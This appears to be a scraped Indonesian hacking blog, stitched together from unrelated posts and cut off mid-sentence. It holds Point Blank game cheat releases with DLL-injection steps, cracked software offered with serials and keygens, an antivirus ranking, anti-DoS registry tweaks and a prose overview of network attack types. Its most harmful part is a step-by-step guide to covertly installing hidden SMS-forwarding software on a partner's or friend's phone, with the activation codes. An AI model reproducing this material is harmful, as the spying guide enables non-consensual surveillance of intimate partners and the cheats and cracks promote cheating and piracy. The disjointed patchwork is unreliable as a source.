GALAXI CYBER ™[CHEAT POINTBLANK]™: ANTI VOTE + GRAVITY

GALAXI CYBER ™[CHEAT POINTBLANK]™: ANTI VOTE + GRAVITY: Fitur & Hotkey : Gravity : F1 (ON) F2 (OFF) Anti Vote Kick : F3 (0N) F4 (OFF)

Deep freeze standard 7.21

Deep freeze standard 7.21 full with serial crack keygen undefined



Deep freeze standard 7.21 full version with serial crack keygen ini adalah deep freeze standard keluaran terbaru dari faronics, saya telah mencoba untuk membaypass nya dengan tool Anti Deepfreeze v0.4, namun tool tersebut tidak mampu membuka paksa system deep freeze 7.21, menurut saya saat ini deepfreeze 7.21 full version with serial crack keygen ini aman dari gangguan Anti Deepfreeze v0.4 yang bisa membuka paksa Depfreeze 7.0 , waloupun tidak selamanya v 7.21 aman,karena dimungkinkan tool anti deepfreeznya akan segera update versi selanjutnya tapi setidaknya dapat melindungi komputer warnet anda, tentunya bagi mereka yang kesulitan install deep freeze enterprise. , untuk anti deep freeze terbaru tunggu saja infonya . . . .

Download:

Spoiler

SEDOT LANGSUNG

menyadap HP DAN SMS pacar/teman

Tips Trik Rahasia Menyadap Hp dan SMS Teman/Pacar/Istri/Suami dll

Di sore 2009 ini, saya akan memberikan anda beberapa tips trik rahasia untuk menyadap sms nomer teman anda. Biasanya, trik ini digunakan para detektif tuk mensadap HP seseorang. Baik itu SMS maupun Telepon. ( kok saya bisa tahu trik ini?) Tetapi saya hanya akan menjelaskan kepada anda cara menyadap sms. Menakutkan bila menyadap/sadap telepon. Artikel ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa anda akan sangat besar. Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo saya se..buat adek saya aja, soalnya dia nakal dan suka boong lwt sms. Anda mau tahu kan caranya? setelah anda tahu rahasia ini, anda wajib komentar lo!
Tentu saja ada persyaratan yg harus dipenuhi :

1. Dilarang Memakai ini untuk perbuatan lainnya kecuali untuk hiburan
2. HP adalah HP symbian. Baik HP anda maupun HP teman anda.
3. Merek NOKIA
4. Memiliki aplikasi simbyan smsanywherelite.sis

Nah..persyaratan itu harus anda lakukan sebelum anda mensadap sms. Hp anda harus symbian dan nokia ( kalo bisa). dan hp teman anda yang akan disadap juga symbian dan nokia. (promosi nokia ni). Kalo ga punya nokia, jangan teruskan baca artikel ini karena besar kemungkinan akan gagal. Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :

1. download smsanywherelite.sis atau smsforwaderlite.sis untuk software menyadap
2. Masukkan aplikasi symbian itu di HP anda dan teman anda
3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
4. Siapkan hp/ponsel korban anda
5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

Dengan begini, kita akan tahu mana pacar kita yang selingkuh..mana teman yang berkhianat dan lainnya. Semoga bermanfaat!

SotfWare2 Yang Diperlukan Agar cheat Work 100%

ihh gan.. ane mau share Jamu-Jamu yang biasanya Dibutuhkan kalau mau Nge-Cheat, soalnya kalo gak ada ini pasti Cheat Itu gak work, Nah tapi kalo Udah dipake Semua ini, Cheat bakal WORK 100%..
Langsung aja di Download nih..

Langsung Aja yah nih Buka Spoilernya

Spoiler

Here <<<< Net FrameWork 3.5

Spoiler

Here <<<< Vcredist_x86

Spoiler

Here << Ccleaner

Spoiler

Here <<<<<< Net FrameWork 4

Spoiler

Here <<<Untuk yg mising file dll bisa didownload disini

Spoiler

Here <<<<< Untuk yg missing file ocx bisa didownload disini

Spoiler

Here <<<< DirectX End-User Runtime

Spoiler

Here <<< Nih Windows Instaler << Buat Yang Instal DirectX Und-User RunTime/NetFrameWork Error Instal Ini Terlebih Dahulu

Nah.. tuh Segitu aja Deh dari Saya..
Mungkin kalo agan Sekalian Mau Nambahin.. Share aja yah..
Thanks

Credit : Andre404,google & dll Files

Please No Junk

NB : Kalau Cheat Masih DC Atau BugTrap Berarti Cheat Udah Deteckted

map HACK POINT BLANK

Cara Pakai Maphack
[--]Masuk Room Play
[--]Tekan Numped 1 pada saat loading hitam
[--]Tekan Numped 2 pada saat "akan memulai game"
Timing tidak Tepat Akan Error

LANGSUNG AJA KE tkp

Fitur
[-] Map Hack
[-] Minimaize(beta)/(percobaan)

Hotkey
[-] Map Hack (numped 1) On
[-] Map Hack (numped 2) Off
[-] Minimaize (Insert) on

Tutor
[-] Extrak file dimana saja/ gk di extrak juga gpp
[-] Buka Cheat/ sama PB
[-] lalu start
[-] Select dll for inject[-] Pilih dll nya
[-] inject now
[-] Resume

++++++++LINK

cheat jam 12 siang waktu lapar cafe net

[center]Kalo Mau Liat Link Fullhack Nya tekan klik hahhahahhah

Password: Nih

Thanks To:
Mastur Jery [Me]
Andrie Dan Kawan Kawan
Allah SWT

Fitur:
Magneted + Auto HS : F11/F12 On/Off
Invisble Time\Instant Kill : Delete
Damage ALL Weapon : Delete
Defuse 0 Detik : Delete
Pasang Bom 0 Detik : Delete
No Respon : Delete

Tutorial:
Download Cheat
Buka PBLauncher
Start PBLauncher
Masukan Password
Keluar Notice dll tekan OK
Aktifkan Cheat Di Lobby
Happy Cheating

CHEAT CAFE net kesuma jaya 30-juli-2011 rantau

Fitur & Hotkeys
[-] Magnet On : Home
[-] Magnet Off : Delete
[-] Ghost Mode : F1
[-] Ghost Mode Off : F2
[-] Invisible No Respawn : End

Cara Pemakaian Ghost
[-] Masuk Ke Room ( No RM )
[-] Play
[-] Saat Bermain Tekan Home
[-] Kemudian Tekan F1
[-] Kemudian Tekan Delete
[-] Kemudian Tekan F1 Lagi
[-] Seeeepp Happy Ghost.

Download : ..............
Password : cosmic

NB :
Bila Cheat ini Not Work Mohon Gunakan FD atau Pendukung Cheat lainnya
ane coba tanpa pernah Dc
carilah linknya jika kalian cheater pasti menemukannya

CHEAT CAFE net kesuma jaya 30-juli-2011 rantau

Cridit ( Injector ) :
[-] PMC_PrasManViL
Cridit ( Dll ) :
[-] DarMax Chandra/Me
[-] Julian RPL
[-] Riki Nur M.S
<cafe net>kesuma jaya rantau

Thanks Your For :
[¤] ALL Member K4
[¤] ALL Member ManViL


Relese : 2011/07/30
Work Test : 21.00

Download

Fitur Dan Hotkey :

[-] F5 Aimode Saat memilih Server
[-] Magnet ON : Home
[-] Magnet OF : End
[-] Invisible : Page Up
[-] Ghost ON : Insert
[-] Ghost OF : Delete


Cara Pakai Cheat :
[-] Buka ManViL - Wanted GM.exe
[-] Buka PbLauncer.exe
[-] Cek Pb Dan Star Pb
[-] Kalo Ada Notice Ok'Aja/Enter/Spasi
[-] Happy Cheater



Catatan : Kalo Gak Work Gunakan FD/Lebih Teliti/Kurang Jamu
Perhatian : Jangan Terlalu Show OFF/Untuk Download Klik Gambar di atas !!

cheat instant kill

Cemas Smart XXV..........30 Juli 2011.....INSTANT KILL + MAGNET

Cluster Vignolia Timur Cibubur Ciputra, mulai 150 jt-an

Ads ppcindo

post by CEMAS SMART


klik gambar dibawah ini utk download (CEMAS SMART)




Credit, Fitur & tutor ada didalam

=xWANIEUNx= ™[CHEAT POINTBLANK]™: BLACK EVOLUTION | MAGNET + FULLHACK

=xWANIEUNx= ™[CHEAT POINTBLANK]™: BLACK EVOLUTION | MAGNET + FULLHACK

GALAXI CYBER ™[CHEAT POINTBLANK]™: BLACK EVOLUTION | SPECIAL GHOST

GALAXI CYBER ™[CHEAT POINTBLANK]™: BLACK EVOLUTION | SPECIAL GHOST: "Password : cosmic Credits : [-] AnDiz [STAFF GC] [-] KreSs K4 Fitur & Hotkeys : [-] Ghost On : F1 [ No Off ] Cara Pakai : [-] Extrack Che..."

Keylogger Detector 1.34 Full Serial

Pada kesemptan kali ini saya akan mencoba share software yang mampu mendeteksi program-program jahat seperti keylogger dan program sejenis lainnya. Software ini bernama Keylogger Detector 1.34, dan tentu sudah ada serial buat aktivasi agar full version.

Keylogger Detector merupakan aplikasi yang berfungsi untuk mencari, menemukan dan dapat menghapus program spyware termasuk password stealing programs, chat and email logging software, keystroke loggers, screen capturing programs, dan program sejenis lainnya yang mampu merekam aktivitas komputer anda.

Keylogger Detector Features:

• Updated for Windows Vista and Windows 7 to find and remove modern spy software.
• Unique spy software detection algorithm protects your privacy.
• Quick scan module verifies that no spy related software has been installed on your pc.
• Spyware removal module allows you to completely remove spyware.
• Shows you all spy programs found and all other suspicious monitoring programs installed.
• Scans your memory to find running spy software without long hard disk scanning.
• Creates HTML report containing scanning results to send to our support team.
• Finds new invisible keyloggers that were created specially for Windows Vista and Windows 7
• Has easy and simple to use interface.
• Free to download and to try
• Low price

Password : www.remo-xp.com
Download Keylogger Detector 1.34 Full Serial

AntiARP v6.0.1 + crack

AntiARP v6.0.1 + crack

Filed under: Free Download, Softwares by cikacika — Tinggalkan komentar

3 Juni 2010

Apakah komputer Anda sering kehilangan koneksi internet atau bertentangan IP?
Apakah server Anda selalu diserang oleh hacker?
Apakah Anda khawatir tentang komunikasi data (misalnya MSN, ICQ, EMAIL) dipantau?
Apakah kecepatan koneksi internet Anda di bawah keterbatasan perangkat lunak jaringan administrasi seperti netCut.
Apakah komputer Anda sering menerima serangan oleh berbagai perangkat lunak seperti serangan ARP netCut, dll
Apakah LAN Anda sedang dalam masalah virus ARP?
Masalah di atas semua disebabkan oleh spoofing ARP (ARP serangan).
Pilih AntiARP adalah solusi terbaik dari permasalahan diatas.
Fitur AntiARP’s: Intercept ARP spoofing / ARP serangan / peracunan ARP, Intercept konflik Alamat IP, Dos Mencegah serangan, modus Keselamatan, analisis aliran ARP, Lindungi cache ARP, pertahanan aktif, penyerang Cari, bersih virus ARP.
[Download disini]

size : 2.5 Mb

password rar : cikacika.co.cc

Top 5 Free Antivirus for 2011

Avast Free Antivirus tops our rankings due to its solid detection and friendly interface; Avira AntiVir Personal is a close second, however, on the strength of its malware detection and removal.

Edited by Nick Mediati    Dec 7, 2010 4:00 pm

Click to compare Compare

	Avast Free Antivirus 5 Avast Free Antivirus is a well-rounded free antivirus package: It does a solid job at blocking malware, has a pleasant interface, and scans files quickly. Full Review Last Rated: November 29, 2010
	Avira AntiVir Personal Free AntiVirus 10 Avira AntiVir Personal does an great job at blocking and detecting malware, but its interface needs a makeover. Full Review Last Rated: November 29, 2010
	Microsoft Security Essentials 1.0 Microsoft Security Essentials is easy to use, but it lags behind newer products at detecting malware. Full Review Last Rated: November 29, 2010
	Panda Cloud Antivirus 1.0 Panda Cloud Antivirus is easy to use, but its scanning speeds are slower than average. Look for the Cloud Antivirus 1.3 update, which the company says should improve its attack-blocking capabilities. Full Review Last Rated: November 29, 2010
	Comodo Internet Security Premium 5.0 Comodo Internet Security Premium did a good job at blocking brand-new malware and has a firewall, but its inconsistent overall detection performance makes it tough to recommend. Full Review Last Rated: November 29, 2010
Sponsored Links Newest Norton SecurityProtect your PC Against the Latest Viruses, Spyware & Digital Dangers.www.Norton.com antivirus securitySecure Laptops, Desktops & Servers from Viruses w/ Symantec Solutions.www.Symantec.com/Antivirus Antivirus ProtectionFast, easy-to-use protection against viruses and spyware.www.webroot.com

• Dreaming of $25,000?
  
  Make your dreams come true with $25k or your choice of hundreds of prizes.
  
  Enter sweepstakes.
• Breathtaking 3D Laptop
  
  Play games, watch movies and view photos - all in 3D.
  
  See it here.

<iframe name="ad336showcase" id="ad336showcase" src="http://ad.doubleclick.net/adi/pcw.main.reviews/products/software/antivirus_and_security/chart;pg=chart;c=2131;c=2131;c=2129;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;ord=90888958'+_jsCustomArg+'" width="336" height="280" marginheight="0" marginwidth="0" scrolling="no" frameborder="0"></iframe>

Spyware Doctor with Antivirus

Instantly detect, remove, and block malware with award-winning Spyware Doctor w/ Antivirus 2010. FREE Scan!

• Spyware Doctor with Antivirus

Lenovo Laptop Deals

• 
  ThinkPad Edge Improves look and feel without sacrificing the features that make ThinkPads so well-loved.
  Buy now direct from Lenovo
• 
  ThinkPad W701ds This portable Goliath could replace desktop workstations, letting pros stay productive anywhere.
  Buy now direct from Lenovo

Best Prices on System Utilities

• Most Popular
• All Categories

• 
  System Mechanic v.9.0 Premium Edition $35.41 and up See All Prices
• 
  VMware Fusion v.3.0 $49.99 and up See All Prices
• 
  Workstation v.7.0 $151.00 and up See All Prices
• 
  VMware Fusion v.3.0 $39.99 and up See All Prices

• Laptops
• Under $500
• $500 to $1000
• $1000 to $2000
• $2000 to $3000
• Over $3000

• Desktops
• Under $500
• $500 to $1000
• $1000 to $2000
• Over $2000

• Printers
• Inkjet
• B&W Laser
• Color Laser

• Portable Audio
• MP3 Players
• Accessories

• Digital Cameras
• Cameras
• Lenses
• Accessories

• Software
• Design & Multimedia
• Business Productivity
• Utilities
• Operating Systems

• Monitors
• 18 to 19 Inches
• 20 to 21 Inches
• 21 Inches & Up

• Camcorders
• Camcorders
• Batteries & Power
• Bags & Cases

• Televisions
• Plasma & LCD
• Projection
• TV Accessories & Mounts

• Storage
• Hard Drives
• Flash Memory
• DVD-ROM/DVD Writers

See all Best Prices on System Utilities

See also: Best Prices on Security Software, Best Prices on Antivirus Software, Graphics & Publishing Software, Windows Software, PC Games

Downloads: Freeware, Shareware and Software to Buy

• Most Popular Downloads
• Editor's Roundup

• avast! Free Antivirus Free antivirus protection just as good as the 'big boys.'
• AVG Anti-Virus Free Edition Free program protects against viruses and hackers.
• 3D Desktop This free Windows 7 theme includes dozens of gorgeous 3D images.

See more in Downloads

• PCWorld Reviewers' Favorite Files: January 2011 Our reviewers sampled a little bit of everything in January: desktop utilities, karaoke, a help program that's actually helpful. Some of their favorites came from our features 10 Must-Have Google Chrome Extensions and Microsoft Word Alternatives: Wordsmiths, Rejoice!.
• Welcome Year of the Rabbit With Chinese New Year Downloads Now's the time to freshen up the house, yourself, and your PC for the year to come. Feasting, family, and fun are all parts of the celebration, and these downloads--from video calling to recipe software to fonts and desktop themes--are here to help with just that. We've even found a program to help understand the lunar calendar itself.
• Microsoft Word Alternatives: Wordsmiths, Rejoice! Microsoft Word is ubiquitous--but it isn't the only choice. Whether your main concern is price, complexity, specialized functionality, system footprint, or some combination of the above, one of these word processors may give you what Word doesn't.

See more in Downloads

Today's Special Offers

• LaCie 4big Quadra: Capacity, Security, Performance
  With 7 RAID modes, and up to 8TB of capacity, the 4big Quadra is the ultimate 4-bay RAID solution.
  Brother® printers rated #1 by PC Magazine readers
  See why we're #1 in reliability, customer satisfaction, likely to recommend.
  VIPRE Antivirus + Antispyware
  VIPRE is the only Antivirus that won't slow down your computer
  SynJ™ from AT&T: The Small Business Phone System
  See how SynJ's cordless handsets, extended-range and intuitive navigation make you more productive
  The perfectly sized Samsung Tab™.
  Introducing the first Android™ tablet from Sprint. It's brilliantly big yet ingeniously small.
  QNAP Turbo NAS - Highest Performance NAS Available
  QNAP's Pro+ lineup of Turbo NAS servers deliver incredible 113MB/Sec performance for SMB customers
• SynJ™ from AT&T: The Small Business Phone System
  See how SynJ's cordless handsets, extended-range and intuitive navigation make you more productive
  Simplify storage with the power of convergence.
  HP StorageWorks D2D2500 Backup System with Intel® Xeon® 5500 series
  LaCie 4big Quadra: Capacity, Security, Performance
  With 7 RAID modes, and up to 8TB of capacity, the 4big Quadra is the ultimate 4-bay RAID solution.
  Internet Marketing Master's Degree - Online
  Master Online Marketing and develop next-level brand strategies iwth a degree from Full Sail University.
  VIPRE Antivirus + Antispyware
  VIPRE is the only Antivirus that won't slow down your computer
  Save now with the best deals from CDW.
  Click here to save on desktops, notebooks, LCDs, printers and more.
• More than just time
  Discover the new Acer Aspire TimelineX - learn more in the Acer Laptop Center
  Experience the MAINGEAR Difference
  Discover the MAINGEAR SHIFT with Super Stock options, overclocked, liquid cooled and specially painted just for you.
  The perfectly sized Samsung Tab™.
  Introducing the first Android™ tablet from Sprint. It's brilliantly big yet ingeniously small.
  LaCie 4big Quadra: Capacity, Security, Performance
  With 7 RAID modes, and up to 8TB of capacity, the 4big Quadra is the ultimate 4-bay RAID solution.
  SynJ™ from AT&T: The Small Business Phone System
  See how SynJ's cordless handsets, extended-range and intuitive navigation make you more productive
  VIPRE Antivirus + Antispyware
  VIPRE is the only Antivirus that won't slow down your computer

Editors' Picks

•  
•  

• 
  Cloud Printers Rain On Security Parade
• 
  Antivirus 2011: Digital Defenders
• 
  Trend Micro Titanium Antivirus 2011
• 
  Panda Antivirus Pro 2011

CARA CEK TAGIHAN PLN DAN TELPON

share ne gan buat yang belum tau kalau yang sudah tau monggo di tambin mungkin ada cara yang paling simpel lagi.....singkat aje ye
langsung aja ne ke tkp plug-in Firefox PLN
info program akan terinstal di tolbar firefox,nah kalau tidak mau nginstal kita juga bisa cek langsung dari sini
kalau untuk cek tagihan telpon disini

semoga bermanfaat gan....kalau ada yang lebih cepat lagi tinggal tambahin gan....PALEMBANG HECKER...<WANDI RANTAU JUSTASK>

scan virus online

http://www.virustotal.com

http://virusscan.jotti.org/

http://www.kasperskylab.com/

http://scanner.virus.org/

http://online.drweb.com/

http://www.gietl.com/test-clamav/

http://onlinescan.avast.com/http://novirusthanks.org/

sality killer<<<<<<nice gan

nih gan ane share bagi yang susah ngapus virus sality di komp agan. :piss:

[HIDE-THANKS]DoNLoT GaN[/HIDE-THANKS]



Palembang hecker

encegah komputer anda dari dos atau denial of service

melakukan dos dengan sangat mudah DI WINDOWS . Dan Windows merupakan OS yang paling gampang dan rentan dari serangan ini. Pada treath ini, /me ingin memberikan cara untuk memprotek komputer anda dari serangan dos atau denial of service attack. Gak lucu kan abis nyerang orang, kompi anda diserang balik, eh jebol juga

here we go !!!!!!


kita masuk pada point inti.. buka regedit. Dan ikuti langkah - langkah berikut ini:

Pertama:

1. HKEY_LOCAL_MACHINE
2. SOFTWARE
3. Microsoft
4. UPnP Device Host atau UPnP Control Point
5. Pada sisi sebelah kanan, klik kanan New - DWORD Value berikan nama DownloadScope dan beri nilai 3.




Kedua:

Ikuti cara pertama, dan Masuk ke HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SSDPSRV\Parameters and klik new - dword dan beri nama TTL lalu beri dengan nilai 30. Tutup regedit anda, dan restart komputer.


mudah khan broe

15 Jenis Serangan Cracker

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet
Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi
dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP)
dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan
pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi
Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.
Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan
dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak
mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source
yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain,
Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya
sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan.
Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak
packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan
setiap serangan spoofing.

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.
Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang
digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of
Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles
ketika serangan ini dijalakan melewati UDP.
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers,
tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap
network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di
amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti
satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang
pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan
jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.
TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk
menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service).
Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang
dengan cara ini.
Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk
menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS
akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara
berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara
mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan
oleh system yang sudah terkena serangan sangat parah).

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.
Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang
dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan
menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika
terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali.

Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak
pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content –
based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk
perusakan dan pembobolan.
Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali
menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network
tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters)
yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara
ini.


6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker
kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi
antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding
merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi
down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan mengexploitasi
fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi
email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang
berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set
untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate
lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.
Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system
menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang
diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood
dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu
memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin
tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command
yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk
memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.
Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol perute-
